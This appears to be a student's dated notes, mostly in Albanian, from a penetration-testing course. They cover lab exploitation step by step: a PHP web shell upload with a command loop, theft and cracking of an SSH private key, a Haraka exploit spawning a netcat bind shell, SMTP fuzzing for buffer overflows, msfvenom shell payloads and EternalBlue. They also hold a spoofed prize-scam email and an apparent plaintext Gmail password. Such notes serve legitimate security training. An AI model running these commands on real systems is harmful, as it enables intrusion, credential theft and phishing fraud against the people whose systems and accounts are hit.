PC137425
07.01.2019
buffer overflow??
karaktirisik gjuha "C"
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",25))
s.recv(1024)
s.send("ehlo google.com\r\n")
s.recv(1024)
required:
win7 fresh install
immunity debugger
cka presim prej keti moduli
me bo:
simple exploit
advanced exploit
existing exploit xp me bo per win7 apo win10
=================
nmap 172.16.65.1 -p 80
nmap 172.16.65.0/24 -p 80 --open
found
172.16.65.132
download simple-backdoor.php
/usr/share/webshells/php# ls
cd Dekstop# cat simple-backdoor.php
mv simple-backdoor.php tv.php
upload on 172.16.65.132
curl http://172.16.65.132/jQuery/server/php/files/tv.php\?cmd\=cat+/etc/passwd
na jep listen e users ne qat system
==========================
nano exploit_jquery.py
import requests
while True:
cmd = raw_input("> ")
r = requests.get("http://172.16.65.132/jQuery/server/php/files/tv.php?cmd={}".format(cmd))
print r.text
python exploit_jquery.py
==========================
cat /etc/passwd
ls /home/hot
##csf.zip found
ls -al /home/hot/csf.zip ##check permissions
ls -al /home/hot ##list files in that directory
ls -al /home/hot/.ssh/ ##backup file permision rwx
cat /home/hot/.ssh/backup ##private key found
copy private key cane to id_rs.key
ssh -i id_srahot.key hot@172.16.65.132 v ##Load key "id_rs.key": bad permissions
chmod 600 id_sr.key
ssh -i id_sr.key hot@172.16.65.132 ## key is encrypted
##bruteforce required
##prepare rockyou.txt
##john to be used
/usr/sbin/ssh2john
ssh2john /root/Desktop/id_srahot.key /Desktop/hash_id
cat hash_id
john hash_id --wordlist=rockyou.txt
## found key "mustang1"
ssh hot@172.16.65.132
$cp csf.zip /var/www/html
$unzip csf.zip cd csf
see proceduren per portknocking
found port 29, searchsploit haraka, /usr/share/exploitdb/ exploits/linux/remote/41162.py
cp 41162.py /home/dardan/Desktop/41162.py
nano 41162.py
smtp port to be modified
python 41162.py -c "nc -lvp 995 -e /bin/bash" -t root@haraka.test -m 172.16.65.132
nc 172.16.65.132 995
id
python -c "import pty;pty.spawn('/bin/bash')
=============================================================================================
=============================================================================================
09.01.2019
3 folders to be created:
apps
explicit-Dev
exploits
qa ka mu mesu:
smush the stack ( means doing buffer overflow)
ne stack, ruhen variablat, funksionet ,,,
patternts ?? nje cikel i perseritjes se nje ngjarje
offset ??
struktura e nje exploit (vul. assesment)??
run a service
scan the IP that runs that service
nmap 172.16.60.x -p10000 psh
telnet 172.16.60.x 10000
hello ##me dergu te dhena, na kthen pergjigje
ne screen te service i sheh logs
funksionet get/put
get #duhet mi deklaru sa byte i pranon ( 1 byte nje karakter)
nese i qet 13 byte... kjo i bjen qe po shkaktojm overflow
pra vull. eshte ne put function
fuzzing #nese qojm psh i dergon 10 bte tani prap 10 tani prap 10 deri kur crash
immunity debugger e sheh ne memory sa byte po dergohen
BufferOverflow/exploits
-----------------------------------------
nano exploit_1.py
import socket
import sys
s = socket.socket(soclket.AF_INIT, socket.SOCK_STREAM)
s.connect((sys.argv[1], 10000))
s.send("hello\r\n")
data =s.recv(1024)
print data
s.close()
python exploit_1.py 172.16.60.x
--------------------------------------
EIP ? me gjet sa AAA duhet ,,,
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -q 6a413969
ESP ? ne immunity debugger ctrl + F JMP ESP
nano exploit_2.py
demo ne immunity debugger
me gjeneru patterns, me gju me patters Targetin e jo me psh AAA..
me komuniku me applkacion
me crash appin
me gjet sa i duhen me crash app
me
msfvenom -p windows/shell_bind_tcp LPORT=4444 -f c-b "\x00"
kernel32.dll
=============================================================================================
=============================================================================================
14.01.2019
Objektivat
Target: 172.16.65.138
Objektivi:
ne porten 21, dyshohet me kon vullnerable
exploiti per qat service eshte per winXP
tash qat service eshte tu e run ne win7
kerkesa eshte me modifiku per win7
Targeti: me hack 172.16.65.138
stage2
keti PoC me ja shtu vull scaner me librarin netaddr, funksioni network
dardan@kali:~/Desktop/exploits/exploits$ python vull.py 172.16.60.75
Stage3
me bo me multi threding
=============================================================================================
=============================================================================================
16.01.2019
fuzzing, ident. brake points
identifikimi i limiteve (memory, disk
TO identify brake point
nano smtp.py
import socket
import system
s = socket.socket(socket.AF.INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],25)
data = s.recv(1024)
s.close()
----------------------------------
import socket
import sys
for i in range(1, 1000):
c = "A" * i
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],25))
data = s.recv(1024)
s.send("ehlo google.com\r\n")
data = s.recv(1024)
s.send("mail from:{}\r\n".format(c))
data = s.recv(1024)
if "553" in data:
print ("Limit is {}".format(i))
break
s.close()
python smtp.py 127.0.0.1
----------------------------
import socket
import sys
for i in range(1, 1000):
c = "A" * i
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],25))
data = s.recv(1024)
s.send("ehlo google.com\r\n")
data = s.recv(1024)
s.send("mail from:a\r\n")
data = s.recv(1024)
s.send("rcpt to:{}\r\n".format(c))
data = s.recv(1024)
if "553 5.1.0" in data:
print ("Limit is {}".format(i))
break
s.close()
python smtp.py 127.0.0.1
----------------------------
sudo apt-get install mailutils
sudo apt-get install sendmail
telnet 127.0.0.1 25
ehlo google.com
-----------------------------------------------
nmap 127.0.0.1 -p25
telnet 127.0.0.1 25
ehlo google.com
mail from:bill@microsoft.com
rcpt to:tima@for4mail.com
data
hello
from:bill@microsoft.com
hi
this bill gates, you won 1 m dollar.
Kind Regards
Bill
.
quit
-----------------------------------------------
google search: allow less security apps off to ON
google search: pop commands
openssl s_client -connect pop.gmail.com:995
USER habibihabib73@gmail.com
PASS cyber123456
=============================================================================================
18.01.2019
pycharm
create new project
create new file test.py
create new file mail_client.py
create new file server_manager.py
create new file email_manager.py
=============================================================================================
=============================================================================================
23.01.2019
...
sudo nasm -f bin eternalblue_kshellcode_x64.asm
ls
cat eternalblue_sc_merge.py
tool: tmux
nmap -p 445 172.16.60.94 --script smb-vuln-ms17-010
exploit -j -z
jobs -k 0
cd shellcode /remove
nano eternalblue_sc_merge.py /copy msfvenom
msfvenom -p windows/x64/shell_reverse_tcp -f raw sc_x64_msf.bin EXITFUN=thread LHOST=172.16.60.94 LPORT=xxxxx
set EXITFUN thread
exploit -j -v
python eternalblue_exploit7.py 182.16.x.x shellcode/ ....
exploit7 me shendrru ne librari
krej subnetit scan per eternal blue, me exploit, payload
mkdir EB
nano main.py /veq a eshte porta 445 qel, app me scanu IP range
=============================================================================================
=============================================================================================
26.01.2019
...
=============================================================================================
=============================================================================================
28.01.2019
bla bla
=============================================================================================
30.01.2019
sjam kon
=============================================================================================
01.02.2019
sjam kon
=============================================================================================
04.02.2019
pen test?
before pent test
- understanding OS-s (not only win and Linux)
services
- vector of attack
metoden per sulm
red team - me gjet vull
blue tram - me fix vull
purple testing - mixed
pen test... means capture the flag
white box
black box
grey box